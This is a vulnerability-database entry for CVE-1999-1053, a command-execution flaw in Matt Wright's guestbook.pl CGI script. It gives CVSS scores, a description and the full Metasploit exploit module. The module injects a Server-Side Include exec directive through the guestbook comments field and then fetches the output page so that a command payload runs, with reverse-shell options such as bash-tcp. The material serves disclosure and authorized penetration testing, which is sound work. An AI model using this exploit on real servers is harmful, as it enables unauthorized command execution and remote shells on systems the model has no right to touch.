Matt Wright guestbook.pl Arbitrary Command Execution

2008-06-0412:19:43

aushack <[email protected]>

www.rapid7.com

117

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.3

Confidence

Low

JSON

The Matt Wright guestbook.pl <= v2.3.1 CGI script contains a flaw that may allow arbitrary command execution. The vulnerability requires that HTML posting is enabled in the guestbook.pl script, and that the web server must have the Server-Side Include (SSI) script handler enabled for the ‘.html’ file type. By combining the script weakness with non-default server configuration, it is possible to exploit this vulnerability successfully.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Matt Wright guestbook.pl Arbitrary Command Execution',
      'Description'    => %q{
        The Matt Wright guestbook.pl <= v2.3.1 CGI script contains
        a flaw that may allow arbitrary command execution. The vulnerability
        requires that HTML posting is enabled in the guestbook.pl script, and
        that the web server must have the Server-Side Include (SSI) script
        handler enabled for the '.html' file type. By combining the script
        weakness with non-default server configuration, it is possible to exploit
        this vulnerability successfully.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '1999-1053' ],
          [ 'OSVDB', '84' ],
          [ 'BID', '776' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
            }
        },
      'Platform'       => %w{ linux unix win },
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '1999-11-05',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('URI', [true, "guestbook.pl script path", "/cgi-bin/guestbook.pl"]),
          OptString.new('URIOUT', [true, "guestbook.html output", "/guestbook/guestbook.html"]),
        ])
  end

  def exploit
    realname	= rand_text_alphanumeric(20)
    email		= rand_text_alphanumeric(20)
    city		= rand_text_alphanumeric(20)
    state		= rand_text_alphanumeric(20)
    country 	= rand_text_alphanumeric(20)

    sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')

    req1 = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI']),
      'method'  => 'POST',
      'data'    => "realname=#{realname}&username=#{email}&city=#{city}&state=#{state}&country=#{country}&comments=#{sploit}",
    }, 25)

    req2 = send_request_raw({
      'uri'     => normalize_uri(datastore['URIOUT']),
    }, 25)

  end
end